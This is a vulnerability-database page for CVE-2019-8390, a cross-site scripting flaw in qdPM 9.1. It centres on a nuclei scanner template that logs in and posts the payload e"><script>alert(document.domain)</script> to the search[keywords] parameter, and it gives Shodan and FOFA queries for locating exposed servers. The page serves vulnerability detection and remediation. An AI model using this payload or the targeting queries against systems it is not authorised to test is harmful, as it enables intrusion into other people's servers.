Lucene search
K

qdPM 9.1 - Cross-site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

qdPM 9.1 Cross-site Scripting vulnerability allows execution of malicious scripts in the victim's browser, leading to session hijacking, defacement, or data theft. Upgrade to a patched version or apply provided security patches

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
qdPM 9.1 - search[keywords] Cross-Site Scripting Vulnerability
18 Feb 201900:00
zdt
CVE
CVE-2019-8390
14 May 201914:57
cve
Cvelist
CVE-2019-8390
14 May 201914:57
cvelist
Exploit DB
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
18 Feb 201900:00
exploitdb
EUVD
EUVD-2019-17780
7 Oct 202500:30
euvd
exploitpack
qdPM 9.1 - search[keywords] Cross-Site Scripting
18 Feb 201900:00
exploitpack
NVD
CVE-2019-8390
14 May 201915:29
nvd
OSV
CVE-2019-8390
14 May 201915:29
osv
Packet Storm
qdPM 9.1 Cross Site Scripting
18 Feb 201900:00
packetstorm
Prion
Cross site scripting
14 May 201915:29
prion
Rows per page
id: CVE-2019-8390

info:
  name: qdPM 9.1 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/46399/
    - http://qdpm.net/download-qdpm-free-project-management
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8390
    - http://sourceforge.net/projects/qdpm
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-8390
    cwe-id: CWE-79
    epss-score: 0.08864
    epss-percentile: 0.94576
    cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qdpm
    product: qdpm
    shodan-query: http.favicon.hash:762074255
    fofa-query: icon_hash=762074255
  tags: cve,cve2019,xss,qdpm,authenticated,edb,vuln

http:
  - raw:
      - |
        GET /index.php/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=
      - |
        POST /index.php/users HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'alert alert-info alert-search-result'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="login\[_csrf_token\]" value="(.*?)"'
        internal: true
        part: body
# digest: 490a0046304402206ba4101cba2ef217dc5ed16b4dddb9d4fb0402a9c85d892ad70d03c35f6e27d902204726fd3630aacd81e35dacaf0471207b9f6c9e044faa23ae0f0ce7c40a8b532d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.08864
23